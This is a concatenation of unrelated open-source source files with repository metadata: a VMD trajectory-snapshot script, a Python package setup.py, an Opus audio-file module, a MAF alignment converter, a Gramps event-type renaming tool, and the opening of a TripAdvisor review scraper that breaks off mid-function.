    parser.add_option("-f", dest="num_frames", type="int")
    parser.add_option("-v", dest="vmd_vis")
    parser.add_option('-s', dest="dim", type="string", action="callback",
                      callback=wh_size)
    (options, args) = parser.parse_args()

    # Check number of frames: each "MODEL" record in the PDB is one frame.
    # .decode() so this also works on Python 3, where check_output returns
    # bytes (int(b"5") raises TypeError there).
    num_models = int(subprocess.check_output(
        ["egrep", "-c", "^MODEL", options.input]).decode().strip())

    if options.num_frames is None:
        target_num_frames = num_models
    else:
        target_num_frames = options.num_frames

    # Calculate the step between rendered frames
    the_step = int(math.floor(float(num_models) / target_num_frames))

    # Base visualization state: a user-supplied VMD script, or a plain load.
    if options.vmd_vis is not None:
        vmd_vis = open(options.vmd_vis, "r").read()
    else:
        vmd_vis = "mol load pdb %s\n" % options.input

    new_vis_lines = """# Fit molecules (from vmd tuts.)
set reference_sel [atomselect top "protein" frame 0]
set comparison_sel [atomselect top "protein" frame %d]
set transformation_mat [measure fit $comparison_sel $reference_sel]
set move_sel [atomselect top "all" frame %d]
$move_sel move $transformation_mat
# render it
animate goto %d
render TachyonInternal %s
exit
"""
    # Escape literal '%' in the user script so the '%' formatting below only
    # fills the placeholders in new_vis_lines.
    vmd_vis = vmd_vis.replace("%", "%%")
    new_vis = vmd_vis + new_vis_lines

    # Execute the vis file and render each selected frame to an annotated PNG.
    dir_path = tempfile.mkdtemp()
    for i in range(0, num_models, the_step):
        vis_file_path = os.path.join(dir_path, "%d.vis" % i)
        vis_file = open(vis_file_path, "w")
        image_name = "%03d.tga" % i
        conv_image_name = "%03d.png" % i
        image_path = os.path.join(dir_path, image_name)
        conv_image_path = os.path.join(dir_path, conv_image_name)
        new_vis_contents = new_vis % (i, i, i, image_path)
        vis_file.write(new_vis_contents)
        vis_file.close()
        os.system("vmd -dispdev none -e %s" % vis_file_path)
        # Stamp the frame number onto the converted PNG.
        os.system("convert -gravity North -pointsize 30 -annotate +0+10 '%d' %s %s" % (
            i, image_path, conv_image_path))
    # print() works identically as a statement-free form on Python 2 and 3.
    print(dir_path)

    # Mount everything into a single tiled montage.
    images_glob = os.path.join(dir_path, "???.png")
    os.system("montage %s -mode concatenate -tile %dx%d %s" % (
        images_glob,
        options.dim[0],
        options.dim[1],
        options.output
    ))
    shutil.rmtree(dir_path)
|
victor-gil-sepulveda/PhD-VMDSnapshotTiles
|
take_snapshots.py
|
Python
|
mit
| 3,203
|
[
"VMD"
] |
077b53f0ba9a9c72a445ed08f10749ed197bb292449b085c50d3c6d82dc50bc8
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup
# Packaging metadata for the `gedi` package: Gaussian-process analysis of
# radial-velocity measurements (MSc thesis project).
setup( name = 'gedi',
       packages = ['gedi'],
       version = '0.3.1',
       description = 'Package to analyze radial velocity measurements using Gaussian processes made for a MSc Thesis',
       author = 'Joao Camacho',
       author_email = 'joao.camacho@astro.up.pt',
       license='MIT',
       url = 'https://github.com/jdavidrcamacho/Gedi',
       keywords = ['Gaussian', 'process','radial','velocity','exoplanet'],
       classifiers = ['License :: OSI Approved :: MIT License'],
       # Runtime dependencies; matplotlib is pinned to >=1.5.3.
       install_requires=[
           'numpy',
           'scipy',
           'matplotlib>=1.5.3',
           'emcee'
       ],
)
|
jdavidrcamacho/Gedi
|
setup.py
|
Python
|
mit
| 634
|
[
"Gaussian"
] |
494b74a00c6e94636303b08f77e8ec4e3a9a6d74c8cdc3f164d3248c29a2b38a
|
#!/usr/bin/python
#Audio Tools, a module and set of tools for manipulating audio data
#Copyright (C) 2007-2012 Brian Langenberger
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from audiotools import (AudioFile, InvalidFile)
from .vorbis import (VorbisAudio, VorbisChannelMask)
from .vorbiscomment import VorbisComment
class InvalidOpus(InvalidFile):
    """raised when an Opus file cannot be parsed correctly"""
    pass
#######################
#Vorbis File
#######################
class OpusAudio(VorbisAudio):
"""an Opus file"""
SUFFIX = "opus"
NAME = "opus"
DESCRIPTION = u"Opus Audio Codec"
DEFAULT_COMPRESSION = "10"
COMPRESSION_MODES = tuple(map(str, range(0, 11)))
COMPRESSION_DESCRIPTIONS = {"0": u"lowest quality, fastest encode",
"10": u"best quality, slowest encode"}
BINARIES = ("opusenc", "opusdec")
def __init__(self, filename):
"""filename is a plain string"""
AudioFile.__init__(self, filename)
self.__channels__ = 0
self.__channel_mask__ = 0
#get channel count and channel mask from first packet
from .bitstream import BitstreamReader
try:
f = open(filename, "rb")
try:
ogg_reader = BitstreamReader(f, 1)
(magic_number,
version,
header_type,
granule_position,
self.__serial_number__,
page_sequence_number,
checksum,
segment_count) = ogg_reader.parse(
"4b 8u 8u 64S 32u 32u 32u 8u")
if (magic_number != 'OggS'):
from .text import ERR_OGG_INVALID_MAGIC_NUMBER
raise InvalidFLAC(ERR_OGG_INVALID_MAGIC_NUMBER)
if (version != 0):
from .text import ERR_OGG_INVALID_VERSION
raise InvalidFLAC(ERR_OGG_INVALID_VERSION)
segment_length = ogg_reader.read(8)
(opushead,
version,
self.__channels__,
pre_skip,
input_sample_rate,
output_gain,
mapping_family) = ogg_reader.parse(
"8b 8u 8u 16u 32u 16s 8u")
if (opushead != "OpusHead"):
from .text import ERR_OPUS_INVALID_TYPE
raise InvalidOpus(ERR_OPUS_INVALID_TYPE)
if (version != 1):
from .text import ERR_OPUS_INVALID_VERSION
raise InvalidOpus(ERR_OPUS_INVALID_VERSION)
if (self.__channels__ == 0):
from .text import ERR_OPUS_INVALID_CHANNELS
raise InvalidOpus(ERR_OPUS_INVALID_CHANNELS)
#FIXME - assign channel mask from mapping family
if (mapping_family == 0):
if (self.__channels__ == 1):
self.__channel_mask__ = VorbisChannelMask(0x4)
elif (self.__channels__ == 2):
self.__channel_mask__ = VorbisChannelMask(0x3)
else:
self.__channel_mask__ = VorbisChannelMask(0)
else:
(stream_count,
coupled_stream_count) = ogg_reader.parse("8u 8u")
if (self.__channels__ !=
((coupled_stream_count * 2) +
(stream_count - coupled_stream_count))):
from .text import ERR_OPUS_INVALID_CHANNELS
raise InvalidOpus(ERR_OPUS_INVALID_CHANNELS)
channel_mapping = [ogg_reader.read(8)
for i in xrange(self.__channels__)]
finally:
f.close()
except IOError, msg:
raise InvalidOpus(str(msg))
def update_metadata(self, metadata):
"""takes this track's current MetaData object
as returned by get_metadata() and sets this track's metadata
with any fields updated in that object
raises IOError if unable to write the file
"""
from .bitstream import BitstreamReader
from .bitstream import BitstreamRecorder
from .bitstream import BitstreamWriter
from .ogg import OggStreamWriter
from .ogg import OggStreamReader
from .ogg import read_ogg_packets_data
from . import iter_first
from .vorbiscomment import VorbisComment
if (metadata is None):
return
if (not isinstance(metadata, OpusTags)):
from .text import ERR_FOREIGN_METADATA
raise ValueError(ERR_FOREIGN_METADATA)
original_reader = BitstreamReader(open(self.filename, "rb"), 1)
original_ogg = OggStreamReader(original_reader)
original_serial_number = original_ogg.serial_number
original_packets = read_ogg_packets_data(original_reader)
#save the current file's identification page/packet
#(the ID packet is always fixed size, and fits in one page)
identification_page = original_ogg.read_page()
#discard the current file's comment packet
original_packets.next()
#save all the subsequent Ogg pages
data_pages = list(original_ogg.pages())
del(original_ogg)
del(original_packets)
original_reader.close()
updated_writer = BitstreamWriter(open(self.filename, "wb"), 1)
updated_ogg = OggStreamWriter(updated_writer, original_serial_number)
#write the identification packet in its own page
updated_ogg.write_page(*identification_page)
#write the new comment packet in its own page(s)
comment_writer = BitstreamRecorder(1)
comment_writer.write_bytes("OpusTags")
vendor_string = metadata.vendor_string.encode('utf-8')
comment_writer.build("32u %db" % (len(vendor_string)),
(len(vendor_string), vendor_string))
comment_writer.write(32, len(metadata.comment_strings))
for comment_string in metadata.comment_strings:
comment_string = comment_string.encode('utf-8')
comment_writer.build("32u %db" % (len(comment_string)),
(len(comment_string), comment_string))
for (first_page, segments) in iter_first(
updated_ogg.segments_to_pages(
updated_ogg.packet_to_segments(comment_writer.data()))):
updated_ogg.write_page(0, segments, 0 if first_page else 1, 0, 0)
#write the subsequent Ogg pages
for page in data_pages:
updated_ogg.write_page(*page)
@classmethod
def supports_replay_gain(cls):
"""returns True if this class supports ReplayGain"""
return False
def set_metadata(self, metadata):
"""takes a MetaData object and sets this track's metadata
this metadata includes track name, album name, and so on
raises IOError if unable to write the file"""
if (metadata is not None):
metadata = OpusTags.converted(metadata)
old_metadata = self.get_metadata()
#port vendor string from old metadata to new metadata
metadata.vendor_string = old_metadata.vendor_string
#remove REPLAYGAIN_* tags from new metadata (if any)
for key in [u"REPLAYGAIN_TRACK_GAIN",
u"REPLAYGAIN_TRACK_PEAK",
u"REPLAYGAIN_ALBUM_GAIN",
u"REPLAYGAIN_ALBUM_PEAK",
u"REPLAYGAIN_REFERENCE_LOUDNESS"]:
try:
metadata[key] = old_metadata[key]
except KeyError:
metadata[key] = []
#port "ENCODER" tag from old metadata to new metadata
if (u"ENCODER" in old_metadata):
metadata[u"ENCODER"] = old_metadata[u"ENCODER"]
self.update_metadata(metadata)
def get_metadata(self):
"""returns a MetaData object, or None
raises IOError if unable to read the file"""
from .bitstream import BitstreamReader
from .ogg import read_ogg_packets
from .vorbiscomment import VorbisComment
packets = read_ogg_packets(
BitstreamReader(open(self.filename, "rb"), 1))
identification = packets.next()
comment = packets.next()
if (comment.read_bytes(8) != "OpusTags"):
return None
else:
vendor_string = \
comment.read_bytes(comment.read(32)).decode('utf-8')
comment_strings = [
comment.read_bytes(comment.read(32)).decode('utf-8')
for i in xrange(comment.read(32))]
return OpusTags(comment_strings, vendor_string)
def delete_metadata(self):
"""deletes the track's MetaData
this removes or unsets tags as necessary in order to remove all data
raises IOError if unable to write the file"""
from . import MetaData
#the comment packet is required,
#so simply zero out its contents
self.set_metadata(MetaData())
def total_frames(self):
"""returns the total PCM frames of the track as an integer"""
from .bitstream import BitstreamReader
pcm_samples = 0
end_of_stream = 0
try:
ogg_stream = BitstreamReader(file(self.filename, "rb"), 1)
while (end_of_stream == 0):
(magic_number,
version,
end_of_stream,
granule_position,
page_segment_count) = ogg_stream.parse(
"4b 8u 1p 1p 1u 5p 64S 32p 32p 32p 8u")
ogg_stream.skip_bytes(sum([ogg_stream.read(8) for i in
xrange(page_segment_count)]))
if ((magic_number != "OggS") or (version != 0)):
return 0
if (granule_position >= 0):
pcm_samples = granule_position
ogg_stream.close()
return pcm_samples
except IOError:
return 0
def sample_rate(self):
"""returns the rate of the track's audio as an integer number of Hz"""
return 48000
def to_pcm(self):
"""returns a PCMReader object containing the track's PCM data
if an error occurs initializing a decoder, this should
return a PCMReaderError with an appropriate error message"""
from . import PCMReader
from . import BIN
import subprocess
import os
sub = subprocess.Popen([BIN["opusdec"], "--quiet",
"--rate", str(48000),
self.filename, "-"],
stdout=subprocess.PIPE,
stderr=file(os.devnull, "a"),
creationflags=0x08000000)
pcmreader = PCMReader(sub.stdout,
sample_rate=self.sample_rate(),
channels=self.channels(),
channel_mask=int(self.channel_mask()),
bits_per_sample=self.bits_per_sample(),
process=sub)
if (self.channels() <= 2):
return pcmreader
elif (self.channels() <= 8):
from . import ReorderedPCMReader
standard_channel_mask = self.channel_mask()
vorbis_channel_mask = VorbisChannelMask(self.channel_mask())
return ReorderedPCMReader(
pcmreader,
[vorbis_channel_mask.channels().index(channel) for channel in
standard_channel_mask.channels()])
else:
return pcmreader
@classmethod
def from_pcm(cls, filename, pcmreader, compression=None):
"""encodes a new file from PCM data
takes a filename string, PCMReader object
and optional compression level string
encodes a new audio file from pcmreader's data
at the given filename with the specified compression level
and returns a new AudioFile-compatible object
for example, to encode the FlacAudio file "file.flac" from "file.wav"
at compression level "5":
>>> flac = FlacAudio.from_pcm("file.flac",
... WaveAudio("file.wav").to_pcm(),
... "5")
may raise EncodingError if some problem occurs when
encoding the input file. This includes an error
in the input stream, a problem writing the output file,
or even an EncodingError subclass such as
"UnsupportedBitsPerSample" if the input stream
is formatted in a way this class is unable to support
"""
from . import transfer_framelist_data
from . import BIN
from . import ignore_sigint
from . import EncodingError
from . import DecodingError
from . import UnsupportedChannelMask
from . import __default_quality__
import subprocess
import os
if (((compression is None) or
(compression not in cls.COMPRESSION_MODES))):
compression = __default_quality__(cls.NAME)
devnull = file(os.devnull, 'ab')
sub = subprocess.Popen([BIN["opusenc"], "--quiet",
"--comp", compression,
"--raw",
"--raw-bits", str(pcmreader.bits_per_sample),
"--raw-rate", str(pcmreader.sample_rate),
"--raw-chan", str(pcmreader.channels),
"--raw-endianness", str(0),
"-", filename],
stdin=subprocess.PIPE,
stdout=devnull,
stderr=devnull,
creationflags=0x08000000)
try:
transfer_framelist_data(pcmreader, sub.stdin.write)
except (IOError, ValueError), err:
sub.stdin.close()
sub.wait()
cls.__unlink__(filename)
raise EncodingError(str(err))
except Exception, err:
sub.stdin.close()
sub.wait()
cls.__unlink__(filename)
raise err
sub.stdin.close()
if (sub.wait() == 0):
return OpusAudio(filename)
else:
raise EncodingError(u"unable to encode file with opusenc")
def verify(self, progress=None):
"""verifies the current file for correctness
returns True if the file is okay
raises an InvalidFile with an error message if there is
some problem with the file"""
#Ogg stream verification is likely to be so fast
#that individual calls to progress() are
#a waste of time.
if (progress is not None):
progress(0, 1)
try:
f = open(self.filename, 'rb')
except IOError, err:
raise InvalidOpus(str(err))
try:
try:
from . import verify
verify.ogg(f)
if (progress is not None):
progress(1, 1)
return True
except (IOError, ValueError), err:
raise InvalidOpus(str(err))
finally:
f.close()
class OpusTags(VorbisComment):
    """VorbisComment variant used for the OpusTags packet of an Opus file"""

    @classmethod
    def converted(cls, metadata):
        """converts metadata from another class to OpusTags"""

        from . import VERSION

        if metadata is None:
            return None

        if isinstance(metadata, OpusTags):
            #already the right class - clone its contents
            return cls(metadata.comment_strings[:],
                       metadata.vendor_string)

        source_class = metadata.__class__.__name__
        if source_class == 'FlacMetaData':
            #pull strings out of the FLAC VORBIS_COMMENT block, if present
            if metadata.has_block(4):
                comment_block = metadata.get_block(4)
                return cls(comment_block.comment_strings[:],
                           comment_block.vendor_string)
            return cls([], u"Python Audio Tools %s" % (VERSION))

        if source_class in ('Flac_VORBISCOMMENT', 'VorbisComment'):
            return cls(metadata.comment_strings[:],
                       metadata.vendor_string)

        #generic MetaData - map each populated attribute to a KEY=value string
        converted_strings = [u"%s=%s" % (key, getattr(metadata, attr))
                             for (attr, key) in cls.ATTRIBUTE_MAP.items()
                             if getattr(metadata, attr) is not None]
        return cls(converted_strings, u"Python Audio Tools %s" % (VERSION))

    def __repr__(self):
        return "OpusTags(%s, %s)" % (repr(self.comment_strings),
                                     repr(self.vendor_string))

    def __comment_name__(self):
        return u"Opus Tags"
|
R-a-dio/python-audio-tools
|
audiotools/opus.py
|
Python
|
gpl-2.0
| 17,730
|
[
"Brian"
] |
8451e304d1e8b6dbae8a383216e511f8a5e26d74a034fdb64e2057a5ae4db790
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
MAF format specification:
<http://genome.ucsc.edu/FAQ/FAQformat#format5>
"""
import sys
from bx import interval_index_file
from bx.align import maf
from maize.formats.base import BaseFile
from jcvi.formats.maf import Maf
from maize.apps.base import need_update
from maize.apps.lastz import blastz_score_to_ncbi_expectation, \
blastz_score_to_ncbi_bits
def main():
    """Parse command-line arguments and dispatch to the chosen sub-command."""
    import argparse

    parser = argparse.ArgumentParser(
        formatter_class = argparse.ArgumentDefaultsHelpFormatter,
        description = ''
    )
    sp = parser.add_subparsers(title = 'available commands', dest = 'command')

    # Register each sub-command with its handler function.
    for cmd_name, handler, cmd_help in (
            ('bed', bed, 'convert MAF to BED format'),
            ('blast', blast, 'convert MAF to BLAST tabular format')):
        sub = sp.add_parser(cmd_name, help=cmd_help,
                            formatter_class=argparse.ArgumentDefaultsHelpFormatter)
        sub.add_argument('i', help = '')
        sub.set_defaults(func = handler)

    args = parser.parse_args()
    if args.command:
        args.func(args)
    else:
        print('Error: need to specify a sub command\n')
        parser.print_help()
def bed(args):
    """
    %prog bed maffiles > out.bed

    Convert a folder of maf alignments to the bed features
    then useful to check coverage, etc.
    """
    # FIX: the previous version built an OptionParser, but OptionParser is
    # never imported in this module, so calling bed() raised NameError.
    # main() already parses arguments with argparse and passes a Namespace
    # whose ``i`` attribute is the input MAF file.
    flist = [args.i]
    prefix = flist[0].split(".")[0]

    j = 0
    for f in flist:
        reader = Maf(f).reader
        for rec in reader:
            a, b = rec.components
            # Emit one BED line per aligned component (query "a", subject "b").
            for a, tag in zip((a, b), "ab"):
                name = "{0}_{1:07d}{2}".format(prefix, j, tag)
                print("\t".join(str(x) for x in (a.src, a.forward_strand_start, a.forward_strand_end, name)))
            j += 1
def alignment_details(a, b):
    """Compare two equal-length alignment strings.

    Returns (percent identity, mismatch count, gap count), where a
    position counts as a gap if either string holds "-".
    """
    assert len(a) == len(b)

    nmatch = 0
    nmismatch = 0
    ngaps = 0
    for x, y in zip(a, b):
        if x == y:
            nmatch += 1
        elif x == "-" or y == "-":
            ngaps += 1
        else:
            nmismatch += 1

    pctid = 100. * nmatch / len(a)
    return pctid, nmismatch, ngaps
def maf_to_blast8(f):
    """Print each record of MAF file *f* as a BLAST tabular (-m8) row."""
    for rec in Maf(f).reader:
        a, b = rec.components

        raw_score = rec.score
        expectation = blastz_score_to_ncbi_expectation(raw_score)
        bits = blastz_score_to_ncbi_bits(raw_score)
        evalue = "{0:.2g}".format(expectation)
        score = "{0:.1f}".format(bits)

        hitlen = len(a.text)
        pctid, nmismatch, ngaps = alignment_details(a.text, b.text)

        # Standard 12 columns: query, subject, %id, length, mismatches,
        # gaps, qstart, qstop, sstart, sstop, evalue, bitscore.
        fields = (a.src, b.src, pctid, hitlen,
                  nmismatch, ngaps,
                  a.forward_strand_start, a.forward_strand_end,
                  b.forward_strand_start, b.forward_strand_end,
                  evalue, score)
        print("\t".join(str(x) for x in fields))
def blast(args):
    '''
    %prog blast maffiles > out.blast

    From a folder of .maf files, generate .blast file with tabular format.
    '''
    # FIX: the previous version built an OptionParser, but OptionParser is
    # never imported in this module, so calling blast() raised NameError.
    # main() passes an argparse Namespace with the input file in ``args.i``.
    maf_to_blast8(args.i)
if __name__ == '__main__':
    # CLI entry point: dispatches via the argparse sub-commands in main().
    main()
|
orionzhou/robin
|
formats/maf.py
|
Python
|
gpl-2.0
| 3,492
|
[
"BLAST"
] |
c6f73b2eeaad011e7e2d8297b910bc703d4ea1538f4db47f367ce135c69a59ca
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2006 Donald N. Allingham
# Copyright (C) 2008 Brian G. Matherly
# Copyright (C) 2010 Jakim Friant
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"""Database Processing/Rename Event Types"""
#------------------------------------------------------------------------
#
# standard python modules
#
#------------------------------------------------------------------------
from gramps.gen.ggettext import gettext as _
from gramps.gen.ggettext import ngettext
#------------------------------------------------------------------------
#
# GRAMPS modules
#
#------------------------------------------------------------------------
from gramps.gui.utils import ProgressMeter
import locale
from gramps.gui.managedwindow import ManagedWindow
from gramps.gui.autocomp import fill_combo
from gramps.gen.lib import EventType
from gramps.gen.db import DbTxn
from gramps.gui.dialog import OkDialog
from gramps.gui.plug import tool
from gramps.gui.glade import Glade
#-------------------------------------------------------------------------
#
# ChangeTypes class
#
#-------------------------------------------------------------------------
class ChangeTypes(tool.BatchTool, ManagedWindow):
    """Batch tool that renames every event of one type to another type.

    Runs either with a Glade-based dialog (when a uistate is supplied)
    or headless in CLI mode.
    """

    def __init__(self, dbstate, uistate, options_class, name, callback=None):
        tool.BatchTool.__init__(self, dbstate, options_class, name)
        if self.fail:
            # BatchTool initialization aborted (e.g. user cancelled)
            return

        if uistate:
            # GUI mode: build the dialog and wait for user interaction
            self.title = _('Change Event Types')
            ManagedWindow.__init__(self,uistate,[],
                                   self.__class__)
            self.init_gui()
        else:
            # CLI mode: run immediately with the stored options
            self.run_tool(cli=True)

    def init_gui(self):
        """Build the Glade dialog and populate both type combo boxes."""
        # Draw dialog and make it handle everything
        self.glade = Glade()
        self.auto1 = self.glade.get_object("original")
        self.auto2 = self.glade.get_object("new")

        # Need to display localized event names
        etype = EventType()
        event_names = sorted(etype.get_standard_names(), key=locale.strxfrm)

        fill_combo(self.auto1,event_names)
        fill_combo(self.auto2,event_names)

        # Pre-select the types stored from the previous run (XML strings)
        etype.set_from_xml_str(self.options.handler.options_dict['fromtype'])
        self.auto1.get_child().set_text(str(etype))
        etype.set_from_xml_str(self.options.handler.options_dict['totype'])
        self.auto2.get_child().set_text(str(etype))

        window = self.glade.toplevel
        self.set_window(window,self.glade.get_object('title'),self.title)

        self.glade.connect_signals({
            "on_close_clicked" : self.close,
            "on_apply_clicked" : self.on_apply_clicked,
            "on_delete_event" : self.close,
            })
        self.show()

    def build_menu_names(self, obj):
        """Return the (window, menu) titles used by ManagedWindow."""
        return (self.title,None)

    def run_tool(self,cli=False):
        """Rewrite matching events inside one batch transaction.

        Returns a (modified_any, message) tuple.
        """
        # Run tool and return results
        # These are English names, no conversion needed
        fromtype = self.options.handler.options_dict['fromtype']
        totype = self.options.handler.options_dict['totype']

        modified = 0

        with DbTxn(_('Change types'), self.db, batch=True) as self.trans:
            # signals are disabled during the batch and the views are
            # rebuilt once at the end instead
            self.db.disable_signals()
            if not cli:
                progress = ProgressMeter(_('Analyzing Events'),'')
                progress.set_pass('',self.db.get_number_of_events())
            for event_handle in self.db.get_event_handles():
                event = self.db.get_event_from_handle(event_handle)
                # compare against the XML (English) type string
                if event.get_type().xml_str() == fromtype:
                    event.type.set_from_xml_str(totype)
                    modified += 1
                    self.db.commit_event(event,self.trans)
                if not cli:
                    progress.step()
            if not cli:
                progress.close()
        self.db.enable_signals()
        self.db.request_rebuild()

        if modified == 0:
            msg = _("No event record was modified.")
        else:
            msg = ngettext("%d event record was modified."
                    , "%d event records were modified.", modified) % modified

        if cli:
            print "Done: ", msg
        return (bool(modified),msg)

    def on_apply_clicked(self, obj):
        """Apply handler: read both combos, run the tool, report results."""
        # Need to store English names for later comparison
        the_type = EventType()
        the_type.set(self.auto1.get_child().get_text())
        self.options.handler.options_dict['fromtype'] = the_type.xml_str()
        the_type.set(self.auto2.get_child().get_text())
        self.options.handler.options_dict['totype'] = the_type.xml_str()

        modified,msg = self.run_tool(cli=False)
        OkDialog(_('Change types'), msg, self.window)

        # Save options
        self.options.handler.save_options()
        self.close()
#------------------------------------------------------------------------
#
#
#
#------------------------------------------------------------------------
class ChangeTypesOptions(tool.ToolOptions):
    """
    Defines options and provides handling interface.
    """

    def __init__(self, name, person_id=None):
        tool.ToolOptions.__init__(self, name, person_id)

        # Options specific for this report: both are EventType XML strings.
        self.options_dict = {
            'fromtype': '',
            'totype': '',
        }
        self.options_help = {
            'fromtype': ("=str", "Type of events to replace",
                         "Event type string"),
            'totype': ("=str", "New type replacing the old one",
                       "Event type string"),
        }
|
arunkgupta/gramps
|
gramps/plugins/tool/changetypes.py
|
Python
|
gpl-2.0
| 6,334
|
[
"Brian"
] |
7b5a70fa6f5a3c995f77daca2658ba5518097ed3898ef0a79aa446be6c27983e
|
#!/usr/bin/env python
"""
Created on 2015-09-27T16:51:39
"""
from __future__ import division, print_function
import sys
import argparse
import re
import time
try:
import numpy as np
except ImportError:
print('You need numpy installed')
sys.exit(1)
import pandas as pd
from splinter.browser import Browser
import connect_aws_db as cadb
__author__ = "Matt Giguere (github: @mattgiguere)"
__license__ = "MIT"
__version__ = '0.0.1'
__maintainer__ = "Matt Giguere"
__email__ = "matthew.giguere@yale.edu"
__status__ = " Development NOT(Prototype or Production)"
# change default encoding to handle utf characters
reload(sys)
sys.setdefaultencoding('utf8')
def get_hotel_urls(city, state, engine):
    """Retrieve the hotels for the given city and state"""
    # manipulate the city string into the proper form
    # (underscores in the CLI value become spaces in the DB)
    citystr = ' '.join(city.lower().split('_'))

    query = ("SELECT hotel_id, business_id, hotel_url FROM ta_hotels WHERE "
             "hotel_city='" + citystr + "' AND "
             "hotel_state='" + state.lower() + "'")
    rows = engine.execute(query)
    return [(row['hotel_id'], row['business_id'], row['hotel_url'])
            for row in rows]
def return_results(url, page, br):
    """Scrape one TripAdvisor review page with a splinter browser.

    Visits *url* with browser *br*, extracts every review on the page,
    and returns a dict of parallel lists plus pagination state:
    the 'url' of the next page, 'more_reviews' flag, and updated 'page'.
    """
    br.visit(url)
    # random delay to look less like a bot to TripAdvisor
    sleep_amount = np.random.uniform(8, 20)
    print('sleeping for {} seconds before continuing.'.format(sleep_amount))
    time.sleep(sleep_amount)
    full_reviews = br.find_by_xpath('//div[contains(@class, "reviewSelector")]')
    page_usernames = []
    page_memberids = []
    page_locations = []
    page_titles = []
    page_ratings = []
    page_dates = []
    page_reviews = []
    page_review_ids = []
    for fullrev in full_reviews:
        # user name:
        try:
            member_info = fullrev.find_by_xpath('div/div[contains(@class, "col1of2")]/div[contains(@class, "member_info")]')
            member_str = member_info.find_by_xpath('div[contains(@class, "memberOverlayLink")]')['id']
            member_id = re.findall('UID_(.*)-', member_str)[0]
            usrnm = member_info.find_by_xpath('div/div[contains(@class, "username mo")]')
        except:
            # NOTE(review): if the very first xpath above raises,
            # member_info stays unbound and the location lookup below
            # will raise NameError - confirm and guard if needed
            print('member_info does not exist')
            member_id = ''
            usrnm = ''
        review = fullrev.find_by_xpath('div/div[@class="col2of2"]/div[@class="innerBubble"]')[0]
        # [1:-1] strips the surrounding quote characters from the title
        title = review.find_by_xpath('div/div[contains(@class, "quote")]').text.strip()[1:-1]
        rating = review.find_by_xpath('div/div[contains(@class, "rating")]/span/img')['alt'].split(' ')[0]
        date = review.find_by_xpath('div/div[contains(@class, "rating")]/span[contains(@class, "ratingDate")]')['title']
        rev = review.find_by_xpath('div/div[contains(@class, "entry")]').text.strip().replace("\n", "")
        if len(usrnm) > 0:
            # Python 2 str.decode; anonymous reviewers have no username
            susrnm = usrnm[0].text
            username = susrnm.decode('utf-8', 'ignore').strip()
            print('Username: {}'.format(username))
        else:
            username = ''
            print('Username: A Trip Advisor Member')
        locationel = member_info.find_by_xpath('div[contains(@class, "location")]')
        if len(locationel) > 0:
            location = str(locationel[0].text).strip()
            print('Location: {}'.format(location))
        else:
            location = ''
            print('Location: ')
        #print('full review_id: {}'.format(fullrev['id']))
        try:
            # element id looks like "review_12345" - keep the numeric part
            rev_id = re.search('review_(\d+)$', fullrev['id']).group(1)
        except AttributeError:
            rev_id = ''
        # print('review_id: {}'.format(rev_id))
        # print('Title: {}'.format(title))
        # print('Rating: {}'.format(rating))
        # print('Date: {}'.format(date))
        # print('Review:')
        # print(rev)
        # print('*'*50)
        # remove 4-byte unicode text:
        try:
            highpoints = re.compile(u'[\U00010000-\U0010ffff]')
        except re.error:
            # UCS-2 build
            highpoints = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
        username = highpoints.sub(u'', username)
        title = highpoints.sub(u'', title)
        rev = highpoints.sub(u'', rev)
        page_usernames.append(username)
        page_memberids.append(member_id)
        page_locations.append(location)
        page_titles.append(title)
        page_ratings.append(rating)
        page_dates.append(date)
        page_reviews.append(rev)
        page_review_ids.append(rev_id)
    # pagination: follow the "next" link if present
    if len(br.find_by_xpath('//a[contains(@class, "next")]')) > 0:
        url = br.find_by_xpath('//a[contains(@class, "next")]')['href']
        more_reviews = True
        page += 1
        # print('url and page updated.')
    else:
        more_reviews = False
    ret_dict = {'usrnms': page_usernames,
                'mmbrids': page_memberids,
                'locs': page_locations,
                'ttls': page_titles,
                'rtngs': page_ratings,
                'dts': page_dates,
                'rvws': page_reviews,
                'revids': page_review_ids,
                'url': url,
                'more_reviews': more_reviews,
                'page': page}
    return ret_dict
def get_done_business_ids(city, engine):
    """Return the business_ids that already have reviews stored for *city*."""
    query = ('select distinct r.business_id from '
             'ta_reviews r inner join ta_hotels h on r.business_id = '
             'h.business_id where h.hotel_city = "' +
             ' '.join(city.split('_')) + '" ')
    return [int(row[0]) for row in pd.read_sql_query(query, engine).values]
def get_biz_review_ids(city, engine):
    """Return the TripAdvisor review ids already stored for *city*."""
    query = ('select biz_review_id from ta_reviews r inner join '
             'ta_hotels h on r.business_id=h.business_id '
             'where h.hotel_city = '
             '"' + ' '.join(city.split('_')) + '"')
    try:
        return [int(rev_id[0])
                for rev_id in pd.read_sql_query(query, engine).values]
    except:
        # retry once with a fresh connection (e.g. stale/timed-out handle)
        engine = cadb.connect_aws_db(write_unicode=True)
        return [int(rev_id[0])
                for rev_id in pd.read_sql_query(query, engine).values]
def remove_duplicates(bigdf, city, engine):
    """Drop rows of *bigdf* whose biz_review_id is already in the database."""
    existing_ids = get_biz_review_ids(city, engine)
    if not existing_ids:
        return bigdf
    return bigdf[~bigdf['biz_review_id'].isin(existing_ids)].copy()
def scrape_hotel(url, br, engine):
    """Scrape every review page for one hotel and return them as a DataFrame."""
    columns = ['review_id',
               'hotel_id',
               'business_id',
               'biz_review_id',
